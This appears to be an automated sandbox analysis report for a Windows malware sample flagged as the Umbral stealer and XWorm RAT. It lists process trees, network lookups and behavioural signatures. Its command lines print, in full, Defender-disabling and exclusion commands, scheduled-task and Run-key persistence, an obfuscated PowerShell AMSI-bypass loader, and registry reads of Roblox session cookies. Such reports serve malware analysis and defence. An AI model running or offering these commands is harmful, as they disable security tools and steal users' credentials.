C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oaSExpkudVCx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vKDQJdzZhUHcxb,[Parameter(Position=1)][Type]$wpdQgvzinM)$FNlWDXhLNEf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$FNlWDXhLNEf.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$FNlWDXhLNEf.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Hi
'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$wpdQgvzinM,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+','+''+'M'+'an'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $FNlWDXhLNEf.CreateType();}$EeUsnCPsQHzJL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$WvdLDGOHBzEpPW=$EeUsnCPsQHzJL.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+'dr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xjLuGNtkNKzFGQQbgRE=oaSExpkudVCx @([String])([IntPtr]);$OShaGrHhfzBAuveWJhpeov=oaSExpkudVCx 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KRYKBJIXbGa=$EeUsnCPsQHzJL.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$sqtVbxEkGcentu=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+'A'+'')));$UzKPgwQTtnHpPBbHl=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object]('V'+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+'c'+'t')));$fWasPGS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sqtVbxEkGcentu,$xjLuGNtkNKzFGQQbgRE).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+'l'+'l');$JVdeMOyWmGqrvSAXn=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$fWasPGS,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+'B'+'u'+'ff'+'e'+''+[Char](114)+'')));$nmyhrEHocC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,4,[ref]$nmyhrEHocC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JVdeMOyWmGqrvSAXn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,0x20,[ref]$nmyhrEHocC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{247bfd2f-a347-44c7-8793-1b197dc51c69}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-07-08 17:43

Reported

2024-07-08 17:47

Platform

win7-20240708-en

Max time kernel

149s

Max time network

17s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3056 created 428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d4f18d5ed1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2148 wrote to memory of 428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2148 wrote to memory of 472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 2148 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2148 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2148 wrote to memory of 600 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2148 wrote to memory of 824 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 860 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 972 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 284 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 892 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2148 wrote to memory of 1076 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 1088 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 2148 wrote to memory of 1168 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 2148 wrote to memory of 1212 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 2148 wrote to memory of 2032 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 2148 wrote to memory of 1312 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 1444 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2148 wrote to memory of 2276 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 2452 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe
PID 2148 wrote to memory of 2060 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2148 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2148 wrote to memory of 2664 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskeng.exe
PID 2148 wrote to memory of 3056 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2148 wrote to memory of 1784 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\conhost.exe
PID 2148 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8ED4C929-B5AF-4994-9499-5E66336DC382} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+''+'w'+'s'+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1488989902-8233939581229876322-570263738871046913-1894565484-1302777071-363881733"

C:\Windows\System32\dllhost.exe

